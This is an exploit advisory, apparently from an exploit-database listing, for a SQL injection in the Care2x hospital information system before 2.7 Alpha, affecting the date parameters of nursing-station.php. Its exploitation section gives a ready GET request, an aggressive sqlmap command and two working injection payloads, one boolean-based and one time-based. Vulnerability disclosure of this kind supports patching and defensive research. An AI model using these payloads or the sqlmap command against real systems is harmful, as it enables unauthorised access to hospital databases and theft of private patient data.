Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection

vendor:

Care2x Integrated Hospital Info System

by:

Security For Everyone Team

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Care2x Integrated Hospital Info System

Affected Version From: < 2.7 Alpha

Affected Version To: < 2.7 Alpha

Patch Exists: YES

Related CWE: N/A

CPE: a:care2x:care2x_integrated_hospital_information_system

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/Windows

2021

Care2x Integrated Hospital Info System 2.7 – ‘Multiple’ SQL Injection

In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the 'pday', 'pmonth', 'pyear' parameters. The vulnerability is found in the 'pday', 'pmonth', 'pyear' parameters in GET request sent to page 'nursing-station.php'. An attacker can exploit this vulnerability to access private data in the database system.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection
# Date: 29.07.2021
# Exploit Author: securityforeveryone.com
# Vendor Homepage: https://care2x.org
# Software Link: https://sourceforge.net/projects/care2002/
# Version: =< 2.7 Alpha
# Tested on: Linux/Windows
# Researchers : Security For Everyone Team - https://securityforeveryone.com

DESCRIPTION

In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters.

The vulnerability is found in the "pday", "pmonth", "pyear" parameters in GET request sent to page "nursing-station.php".

Example:

/nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=123123&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= 

if an attacker exploits this vulnerability, attacker may access private data in the database system.

EXPLOITATION

# GET /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=station&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= HTTP/1.1
# Host: Target

Sqlmap command: sqlmap.py -r request.txt --level 5 --risk 3 -p year --random-agent --dbs 

Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl
Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg